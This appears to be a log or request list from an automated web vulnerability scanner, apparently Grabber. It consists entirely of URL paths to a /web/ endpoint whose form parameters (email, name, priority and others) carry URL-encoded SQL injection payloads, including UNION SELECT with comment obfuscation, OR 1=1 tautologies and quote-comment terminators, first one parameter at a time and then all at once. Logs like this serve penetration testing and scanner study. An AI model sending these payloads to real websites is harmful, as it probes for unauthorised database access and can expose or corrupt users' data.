/web/
/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-email=1%27GRABBER_SQL_INJECTION
/web/?demo-email=1%27GRABBER_SQL_INJECTION
/web/?demo-email=1%27+OR+1+OR+1%3D%27
/web/?demo-email=1%27+OR+1+OR+1%3D%27
/web/?demo-email=OR+1%3D1
/web/?demo-email=OR+1%3D1
/web/?demo-email=%22OR+%221%22%3D%221
/web/?demo-email=%22OR+%221%22%3D%221
/web/?demo-email=%27%3B--
/web/?demo-email=%27%3B--
/web/?demo-email=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-email=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-email=1%27+OR+1+OR+1%3D%27
/web/?demo-email=1%27+OR+1+OR+1%3D%27
/web/?name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?name=1%27GRABBER_SQL_INJECTION
/web/?name=1%27GRABBER_SQL_INJECTION
/web/?name=1%27+OR+1+OR+1%3D%27
/web/?name=1%27+OR+1+OR+1%3D%27
/web/?name=OR+1%3D1
/web/?name=OR+1%3D1
/web/?name=%22OR+%221%22%3D%221
/web/?name=%22OR+%221%22%3D%221
/web/?name=%27%3B--
/web/?name=%27%3B--
/web/?name=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?name=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?name=1%27+OR+1+OR+1%3D%27
/web/?name=1%27+OR+1+OR+1%3D%27
/web/?demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-priority=1%27GRABBER_SQL_INJECTION
/web/?demo-priority=1%27GRABBER_SQL_INJECTION
/web/?demo-priority=1%27+OR+1+OR+1%3D%27
/web/?demo-priority=1%27+OR+1+OR+1%3D%27
/web/?demo-priority=OR+1%3D1
/web/?demo-priority=OR+1%3D1
/web/?demo-priority=%22OR+%221%22%3D%221
/web/?demo-priority=%22OR+%221%22%3D%221
/web/?demo-priority=%27%3B--
/web/?demo-priority=%27%3B--
/web/?demo-priority=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-priority=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-priority=1%27+OR+1+OR+1%3D%27
/web/?demo-priority=1%27+OR+1+OR+1%3D%27
/web/?demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-human=1%27GRABBER_SQL_INJECTION
/web/?demo-human=1%27GRABBER_SQL_INJECTION
/web/?demo-human=1%27+OR+1+OR+1%3D%27
/web/?demo-human=1%27+OR+1+OR+1%3D%27
/web/?demo-human=OR+1%3D1
/web/?demo-human=OR+1%3D1
/web/?demo-human=%22OR+%221%22%3D%221
/web/?demo-human=%22OR+%221%22%3D%221
/web/?demo-human=%27%3B--
/web/?demo-human=%27%3B--
/web/?demo-human=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-human=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-human=1%27+OR+1+OR+1%3D%27
/web/?demo-human=1%27+OR+1+OR+1%3D%27
/web/?demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-name=1%27GRABBER_SQL_INJECTION
/web/?demo-name=1%27GRABBER_SQL_INJECTION
/web/?demo-name=1%27+OR+1+OR+1%3D%27
/web/?demo-name=1%27+OR+1+OR+1%3D%27
/web/?demo-name=OR+1%3D1
/web/?demo-name=OR+1%3D1
/web/?demo-name=%22OR+%221%22%3D%221
/web/?demo-name=%22OR+%221%22%3D%221
/web/?demo-name=%27%3B--
/web/?demo-name=%27%3B--
/web/?demo-name=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-name=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-name=1%27+OR+1+OR+1%3D%27
/web/?demo-name=1%27+OR+1+OR+1%3D%27
/web/?demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?demo-copy=1%27GRABBER_SQL_INJECTION
/web/?demo-copy=1%27GRABBER_SQL_INJECTION
/web/?demo-copy=1%27+OR+1+OR+1%3D%27
/web/?demo-copy=1%27+OR+1+OR+1%3D%27
/web/?demo-copy=OR+1%3D1
/web/?demo-copy=OR+1%3D1
/web/?demo-copy=%22OR+%221%22%3D%221
/web/?demo-copy=%22OR+%221%22%3D%221
/web/?demo-copy=%27%3B--
/web/?demo-copy=%27%3B--
/web/?demo-copy=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-copy=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?demo-copy=1%27+OR+1+OR+1%3D%27
/web/?demo-copy=1%27+OR+1+OR+1%3D%27
/web/?email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE
/web/?email=1%27GRABBER_SQL_INJECTION
/web/?email=1%27GRABBER_SQL_INJECTION
/web/?email=1%27+OR+1+OR+1%3D%27
/web/?email=1%27+OR+1+OR+1%3D%27
/web/?email=OR+1%3D1
/web/?email=OR+1%3D1
/web/?email=%22OR+%221%22%3D%221
/web/?email=%22OR+%221%22%3D%221
/web/?email=%27%3B--
/web/?email=%27%3B--
/web/?email=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?email=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--
/web/?email=1%27+OR+1+OR+1%3D%27
/web/?email=1%27+OR+1+OR+1%3D%27
/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&
/web/?demo-email=1%27GRABBER_SQL_INJECTION&name=1%27GRABBER_SQL_INJECTION&demo-priority=1%27GRABBER_SQL_INJECTION&demo-human=1%27GRABBER_SQL_INJECTION&demo-name=1%27GRABBER_SQL_INJECTION&demo-copy=1%27GRABBER_SQL_INJECTION&email=1%27GRABBER_SQL_INJECTION&
/web/?demo-email=1%27+OR+1+OR+1%3D%27&name=1%27+OR+1+OR+1%3D%27&demo-priority=1%27+OR+1+OR+1%3D%27&demo-human=1%27+OR+1+OR+1%3D%27&demo-name=1%27+OR+1+OR+1%3D%27&demo-copy=1%27+OR+1+OR+1%3D%27&email=1%27+OR+1+OR+1%3D%27&
/web/?demo-email=OR+1%3D1&name=OR+1%3D1&demo-priority=OR+1%3D1&demo-human=OR+1%3D1&demo-name=OR+1%3D1&demo-copy=OR+1%3D1&email=OR+1%3D1&
/web/?demo-email=%22OR+%221%22%3D%221&name=%22OR+%221%22%3D%221&demo-priority=%22OR+%221%22%3D%221&demo-human=%22OR+%221%22%3D%221&demo-name=%22OR+%221%22%3D%221&demo-copy=%22OR+%221%22%3D%221&email=%22OR+%221%22%3D%221&
/web/?demo-email=%27%3B--&name=%27%3B--&demo-priority=%27%3B--&demo-human=%27%3B--&demo-name=%27%3B--&demo-copy=%27%3B--&email=%27%3B--&
/web/?demo-email=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--&name=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--&demo-priority=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--&demo-human=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--&demo-name=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--&demo-copy=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--&email=%5C%27%3B+GRABBER_SQL_STATEMENT%3B+--&
/web/?demo-email=1%27+OR+1+OR+1%3D%27&name=1%27+OR+1+OR+1%3D%27&demo-priority=1%27+OR+1+OR+1%3D%27&demo-human=1%27+OR+1+OR+1%3D%27&demo-name=1%27+OR+1+OR+1%3D%27&demo-copy=1%27+OR+1+OR+1%3D%27&email=1%27+OR+1+OR+1%3D%27&
